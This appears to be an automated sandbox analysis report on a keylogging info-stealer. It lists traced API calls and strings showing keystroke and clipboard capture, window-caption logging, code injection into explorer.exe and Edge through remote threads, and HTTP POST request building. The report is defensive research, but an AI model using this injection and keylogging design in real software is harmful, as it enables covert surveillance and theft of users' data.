Process32Next.KERNEL32 ref: 008C3532
CloseHandle.KERNELBASE ref: 008C3543
SleepEx.KERNELBASE ref: 008C354E

Memory Dump Source

Source File: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 008C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8c1000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction ID: 65544898f8ed0d157cf7cca2b6e2f9285203968ff8bd553a1c1888de14ff2e40
Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction Fuzzy Hash: 958113312187088FEB1AEF54E898FE6B7B1FB61741F54861EA442C7160EF78DA05CB81

Function 008CA048 Relevance: 4.7, APIs: 3, Instructions: 223
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 008CA147
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 008CA1BB
VirtualProtect.KERNELBASE ref: 008CA1D9

Memory Dump Source

Source File: 00000010.00000002.4486772603.00000000008C7000.00000040.80000000.00040000.00000000.sdmp, Offset: 008C7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8c7000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction ID: f95251fe0f7530c0cfa43dd802f5d84949b57f118a7a355aed3a0e4a696786f0
Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction Fuzzy Hash: 33514731258D1D4ACB2CAA789CC4BB5B7E1F75532DF18062FD48AC3285E579D8468383

Analysis Process: explorer.exePID: 3944, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	97.5%
Signature Coverage:	17.7%
Total number of Nodes:	322
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02FE1016 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 193
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02FE2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02FE29F3,-00000001,02FE128C), ref: 02FE2731

Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02FE1038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02FE106C
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02FE1075
GetCurrentProcessId.KERNEL32(?,02FE1010), ref: 02FE107B
wsprintfA.USER32 ref: 02FE10E7
RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02FE1155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02FE1160
Process32First.KERNEL32(00000000,?), ref: 02FE117F
CharLowerA.USER32(?), ref: 02FE1199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02FE11B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02FE1212
Process32Next.KERNEL32(00000000,00000128), ref: 02FE126C
CloseHandle.KERNEL32(00000000), ref: 02FE127F
Sleep.KERNELBASE(000003E8), ref: 02FE129F

Strings

0-vP,v, xrefs: 02FE1075
microsoftedgecp.exe, xrefs: 02FE1208
|:|, xrefs: 02FE1125
keylog_rules=, xrefs: 02FE110D
explorer.exe, xrefs: 02FE11AB
%s%s, xrefs: 02FE10E1

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
String ID: %s%s$0-vP,v$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3206029838-1059640896
Opcode ID: 6899e6e80a8a1f0a2693913fb0da8e42710208532fc75ce8fc343020a22af9a5
Instruction ID: 2650d226387b7a682c0986f4e4be0b4f08ac45e99ff20038a5b5c253daa41276
Opcode Fuzzy Hash: 6899e6e80a8a1f0a2693913fb0da8e42710208532fc75ce8fc343020a22af9a5
Instruction Fuzzy Hash: E851E870A403059BDF17AF71DC4897BB7AAEB44BD8B000959AB578B290EB349E058F61

Function 02FE10A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13

wsprintfA.USER32 ref: 02FE10E7

Part of subcall function 02FE276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02FE2777
Part of subcall function 02FE276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02FE10FE), ref: 02FE2789

RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02FE1155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02FE1160
Process32First.KERNEL32(00000000,?), ref: 02FE117F
CharLowerA.USER32(?), ref: 02FE1199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02FE11B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02FE1212
Process32Next.KERNEL32(00000000,00000128), ref: 02FE126C
CloseHandle.KERNEL32(00000000), ref: 02FE127F
Sleep.KERNELBASE(000003E8), ref: 02FE129F

Strings

microsoftedgecp.exe, xrefs: 02FE1208
|:|, xrefs: 02FE1125
keylog_rules=, xrefs: 02FE110D
explorer.exe, xrefs: 02FE11AB
%s%s, xrefs: 02FE10E1

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3018447944-2805246637
Opcode ID: e04527e2bc46a1293099e0e4b22c777900fcfa4c690ac4558a7d6cff43b675fc
Instruction ID: b2c8c07faba8463119750515971374a49ce6f19472abbaeeb482781e7c75cba2
Opcode Fuzzy Hash: e04527e2bc46a1293099e0e4b22c777900fcfa4c690ac4558a7d6cff43b675fc
Instruction Fuzzy Hash: 1441E870A443059BDF17AF658C8897BB3AAEB84BD8F000A58AF5787280EB349D058F51

Function 02FE9AE0 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE8000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe8000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc6dc2b4ac3c03095efe70bb524ecd8dca1767c69b94d729e4916ac2d291c6f7
Instruction ID: c420757085c5e8a8cc7af4d2158648c80205cdd0ea31ce04c38651223964943c
Opcode Fuzzy Hash: cc6dc2b4ac3c03095efe70bb524ecd8dca1767c69b94d729e4916ac2d291c6f7
Instruction Fuzzy Hash: F2511AB2E442528ADF229A78CCC07A5B795EB412A4B180779C6E7CB3C6E7D45906C770

Function 02FE276D Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02FE2777
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02FE10FE), ref: 02FE2789

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: e49f67d12755a7458edfadebc9a8b05cea18dc58911462dbcded197822374887
Instruction ID: de26668b27f133e10fb6052df0c8fb461a3b47a3fe73257efe1209141a38db70
Opcode Fuzzy Hash: e49f67d12755a7458edfadebc9a8b05cea18dc58911462dbcded197822374887
Instruction Fuzzy Hash: 31D0E232B45222ABEA745A7A6C0DF93AE9DDF86AE5B010025BA0DD6150E6608820C2B0

Function 02FE275A Relevance: 3.0, APIs: 2, Instructions: 8
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNEL32(00000000,?,02FE129A,00000001), ref: 02FE275E
CloseHandle.KERNELBASE(?,?,02FE129A,00000001), ref: 02FE2765

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: CloseFileHandleUnmapView
String ID:
API String ID: 2381555830-0
Opcode ID: 7dcc46c573bf7f6355f254b0b8a52de67d9a09e89feb16ed5ab3e5567c748ec5
Instruction ID: ae363ebbedc9823e1a988253d764a2af279b34436bc65875411ec7a6ac4859b3
Opcode Fuzzy Hash: 7dcc46c573bf7f6355f254b0b8a52de67d9a09e89feb16ed5ab3e5567c748ec5
Instruction Fuzzy Hash: 52B01232C49034D7CB162734780C8FBBE18EE896B530509D4F30D870044724091187E8

Function 02FE2A09 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: fb1415a34d3958d793e5027c052a824717b925fbf671265c66c69407ce871ed2
Instruction ID: 84eff6fc4463a8c6c4784cebe08f47a904329f95d63d9383083022cd7ad8f75a
Opcode Fuzzy Hash: fb1415a34d3958d793e5027c052a824717b925fbf671265c66c69407ce871ed2
Instruction Fuzzy Hash: 73A002B1E90104EBDD4557A59D0DF35B658A744F55F4049847346CA0409D7554548721

Non-executed Functions

Function 02FE18BF Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02FE2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02FE29F3,-00000001,02FE128C), ref: 02FE2731

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 02FE18F4
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02FE192F
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02FE19BF
RtlMoveMemory.NTDLL(00000000,02FE3638,00000016), ref: 02FE19E6
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02FE1A0E
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02FE1A1E
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02FE1A38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02FE1A40
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1A4E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1A55
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02FE1A6B
GetProcAddress.KERNEL32(00000000), ref: 02FE1A72
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02FE1A88
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02FE1AB2
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02FE1AC5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1ACC
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1AD3
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02FE1AE7
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02FE1AFE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1B0B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1B11
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02FE1B17
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02FE1B1A

Strings

0-vP,v, xrefs: 02FE19B6
atan, xrefs: 02FE1A61
opera_shared_counter, xrefs: 02FE1A31
ntdll, xrefs: 02FE1A66

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: 0-vP,v$atan$ntdll$opera_shared_counter
API String ID: 1066286714-2395699481
Opcode ID: 27c7b7555079675a82f59dee5c2f69257caaa872fe7d497b70def3e4261e3c93
Instruction ID: 0a3171f84ceb5419c96ccde194f24e0528f10ee9b1266ea0feccf1f44cedfbc3
Opcode Fuzzy Hash: 27c7b7555079675a82f59dee5c2f69257caaa872fe7d497b70def3e4261e3c93
Instruction Fuzzy Hash: 7B617271A44209AFDB12DF259C48E7BBBEDEB89798F000559FA4A97240D770DD04CB62

Function 02FE2799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02FE27B5
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02FE27CD
lstrlen.KERNEL32(?,00000000), ref: 02FE27D5
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02FE27E0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02FE27FA
wsprintfA.USER32 ref: 02FE2811
CryptDestroyHash.ADVAPI32(?), ref: 02FE282A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02FE2834

Strings

%02X, xrefs: 02FE280B

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: c3ed0eccd6b8466c1ecf19ae78f3d4bb15ad1ea4f90c5d8a183c2e8025f9a412
Instruction ID: 6159abdca1703dcd84d825c6163d3eb9277e8f734eadfe4b573b511b094ca956
Opcode Fuzzy Hash: c3ed0eccd6b8466c1ecf19ae78f3d4bb15ad1ea4f90c5d8a183c2e8025f9a412
Instruction Fuzzy Hash: 71114971D4010CFFEB129B95EC8CEBEBBBDEB48799F1048A6FA05E6140D6714E119B60

Function 02FE162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 02FE1652
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 02FE167A

Strings

, xrefs: 02FE1699

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: KeyboardStateUnicode
String ID:
API String ID: 3453085656-3916222277
Opcode ID: 63a9210feeb4c46a5ad8951e796ca51008915360b2e17ec5acbd841e6c097ea9
Instruction ID: e2b4a47acd15365103eb2c5ca53dcbc245eb60ca9d506aaf7c5feabc52551a9a
Opcode Fuzzy Hash: 63a9210feeb4c46a5ad8951e796ca51008915360b2e17ec5acbd841e6c097ea9
Instruction Fuzzy Hash: DD01C4B2D002199BDF32CA12D944BFBB3BCAF45B84F08451AEA0AE6040D730DD458EA1

Function 02FE13AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(02FE5013,0000001C), ref: 02FE13C8
VirtualQuery.KERNEL32(02FE13AE,?,0000001C), ref: 02FE13DA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02FE140B
GetCurrentProcessId.KERNEL32(00000004), ref: 02FE141C
wsprintfA.USER32 ref: 02FE1433
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02FE1448
GetLastError.KERNEL32 ref: 02FE144E
RtlInitializeCriticalSection.NTDLL(02FE582C), ref: 02FE1465
Sleep.KERNEL32(000001F4), ref: 02FE1489
GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 02FE14A6
GetProcAddress.KERNEL32(00000000), ref: 02FE14AF
GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 02FE14D0
GetProcAddress.KERNEL32(00000000), ref: 02FE14D3
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02FE14F1
CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 02FE150D
CloseHandle.KERNEL32(00000000), ref: 02FE1514
RtlExitUserThread.NTDLL(00000000), ref: 02FE152A

Strings

kernel32.dll, xrefs: 02FE14EC
TranslateMessage, xrefs: 02FE149C
%s%d%d%d, xrefs: 02FE142D
GetClipboardData, xrefs: 02FE14C6
user32.dll, xrefs: 02FE14A1, 02FE14CB

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
API String ID: 3628807430-1779906909
Opcode ID: 3b24c0e275dab03bd2b54d9a3d4e2697a5a086130b2d26e3786da15252ddfa91
Instruction ID: 97677a0667e7b427767542d71656a57fb3ce859d2f78467a37a366b5987a63cf
Opcode Fuzzy Hash: 3b24c0e275dab03bd2b54d9a3d4e2697a5a086130b2d26e3786da15252ddfa91
Instruction Fuzzy Hash: E641A870E40309EBEF12AB669C1DE6B7B9DEB44BD87004859F7078B340DB75D9148BA1

Function 02FE16B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(02FE582C), ref: 02FE16C4
lstrlenW.KERNEL32 ref: 02FE16DB
lstrlenW.KERNEL32 ref: 02FE16F3
wsprintfW.USER32 ref: 02FE1743
GetForegroundWindow.USER32 ref: 02FE174E
GetWindowTextW.USER32(00000000,02FE5850,00000800), ref: 02FE1767
GetClassNameW.USER32(00000000,02FE5850,00000800), ref: 02FE1774
lstrcmpW.KERNEL32(02FE5020,02FE5850), ref: 02FE1781
lstrcpyW.KERNEL32(02FE5020,02FE5850), ref: 02FE178D
wsprintfW.USER32 ref: 02FE17AD
lstrcatW.KERNEL32 ref: 02FE17C6
RtlLeaveCriticalSection.NTDLL(02FE582C), ref: 02FE17D3

Strings

%s%s%s, xrefs: 02FE1738
%s%s%s%s, xrefs: 02FE17A2
New Window Caption -> , xrefs: 02FE179A
Clipboard -> , xrefs: 02FE1730

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
API String ID: 2651329914-3371406555
Opcode ID: f7ecf592981b267f6faf58ab8bcf5fdd10affa275b4ddc60d2bca7994e9c222c
Instruction ID: 748bffbfbfae54045366050d07eaea440d058fb8515a6f6cba3af3661069778c
Opcode Fuzzy Hash: f7ecf592981b267f6faf58ab8bcf5fdd10affa275b4ddc60d2bca7994e9c222c
Instruction Fuzzy Hash: E421A734E8021DEBEF232B26AC8DE3BBB59EB85FD97440465F7075B101DA258D2087A1

Function 02FE25F1 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 02FE2603
GetCurrentThreadId.KERNEL32 ref: 02FE260B
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02FE261B
Thread32First.KERNEL32(00000000,0000001C), ref: 02FE2629
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02FE2648
SuspendThread.KERNEL32(00000000), ref: 02FE2658
CloseHandle.KERNEL32(00000000), ref: 02FE2667
Thread32Next.KERNEL32(00000000,0000001C), ref: 02FE2677
CloseHandle.KERNEL32(00000000), ref: 02FE2682

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 2f840e8da25cbfe7cac84c2810e608a1a84924cef027fd1e4ddc2ce76cfaf442
Instruction ID: 0a059ae8fe65528216b09c0a772913b09a157a8195be594b4c896787d2ea570f
Opcode Fuzzy Hash: 2f840e8da25cbfe7cac84c2810e608a1a84924cef027fd1e4ddc2ce76cfaf442
Instruction Fuzzy Hash: E0115471C45204EBDF029F60A84C67AFBB8EF84B99F040999FB4697140D73089158FA2

Function 02FE20A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13

Part of subcall function 02FE298A: lstrlen.KERNEL32(02FE4FE2,?,00000000,00000000,02FE20DD,75918A60,02FE4FE2,00000000), ref: 02FE2992
Part of subcall function 02FE298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02FE4FE2,00000001,00000000,00000000), ref: 02FE29A4

Part of subcall function 02FE24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02FE24DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 02FE2139
wsprintfW.USER32 ref: 02FE2272
wsprintfW.USER32 ref: 02FE22DD
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02FE23A7

Strings

Accept: */*Referer: %S, xrefs: 02FE2268
POST, xrefs: 02FE2223
Content-Type: application/x-www-form-urlencoded, xrefs: 02FE2301
Host: %s, xrefs: 02FE22D7

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 73c8474909018441bf8bd70ae025a74fae40a537975f8d6825f5c1863b82296f
Instruction ID: 6089175ba52cca9ab236ddecf50e97c934a357ec83e50fdbb51fc344e8aecbaa
Opcode Fuzzy Hash: 73c8474909018441bf8bd70ae025a74fae40a537975f8d6825f5c1863b82296f
Instruction Fuzzy Hash: 80A15071904345AFEB129F649C84A2FBBEDBB88784F04086DFA86D7251EB74D9048B52

Function 02FE12AE Relevance: 7.6, APIs: 5, Instructions: 93
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02FE29BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,02FE12D9,00000000,00000000,?,00000001), ref: 02FE29C7

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 02FE12DC

Part of subcall function 02FE2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02FE10BF), ref: 02FE2A0C
Part of subcall function 02FE2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02FE2A13

PathMatchSpecA.SHLWAPI(?,00000000), ref: 02FE138A

Part of subcall function 02FE2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02FE1119,00000001), ref: 02FE2850
Part of subcall function 02FE2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02FE1119,00000001), ref: 02FE2855

RtlZeroMemory.NTDLL(00000000,00000104), ref: 02FE1316
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02FE1332

Part of subcall function 02FE2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,02FE136E), ref: 02FE2591
Part of subcall function 02FE2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 02FE259A

RtlMoveMemory.NTDLL(00000000,?,?), ref: 02FE135F

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
String ID:
API String ID: 2993730741-0
Opcode ID: 2f62cee0f5210b1be6d6451df60e73752e63df78d2d28e64445cc78b223f3d1f
Instruction ID: da37b2aedcd4ddd9efb50a02ca3935a9180e62035907512d0af5e93ac016cca4
Opcode Fuzzy Hash: 2f62cee0f5210b1be6d6451df60e73752e63df78d2d28e64445cc78b223f3d1f
Instruction Fuzzy Hash: 09215070B042059F8F16EE29985497FB79EBB84784B10092EBE5BD7740EB34DD098B62

Function 02FE1581 Relevance: 7.6, APIs: 5, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalLock.KERNEL32(00000000), ref: 02FE15A9
lstrlenW.KERNEL32(00000000), ref: 02FE15C6
lstrcatW.KERNEL32(00000000,00000000), ref: 02FE15DC
lstrlenW.KERNEL32(00000000), ref: 02FE1600
GlobalUnlock.KERNEL32(00000000), ref: 02FE161C

Memory Dump Source

Source File: 00000012.00000002.4486969548.0000000002FE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2fe1000_explorer.jbxd

Similarity

API ID: Globallstrlen$LockUnlocklstrcat
String ID:
API String ID: 1114890469-0
Opcode ID: e0fcca54cb3702629e0b385bc1797b75d8659348f3d83fdd5d014c7e9613b4d4
Instruction ID: 398c11a889fddfd78663acdc6656005ba20ccb107ab641fad9413f4e4ea811ed
Opcode Fuzzy Hash: e0fcca54cb3702629e0b385bc1797b75d8659348f3d83fdd5d014c7e9613b4d4
Instruction Fuzzy Hash: 57010C72F00205979E27667B5D9857F729F9FC56D87090436EB0F93200EF348C028A50

Function 02FE1BBD Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 02FE1BF4
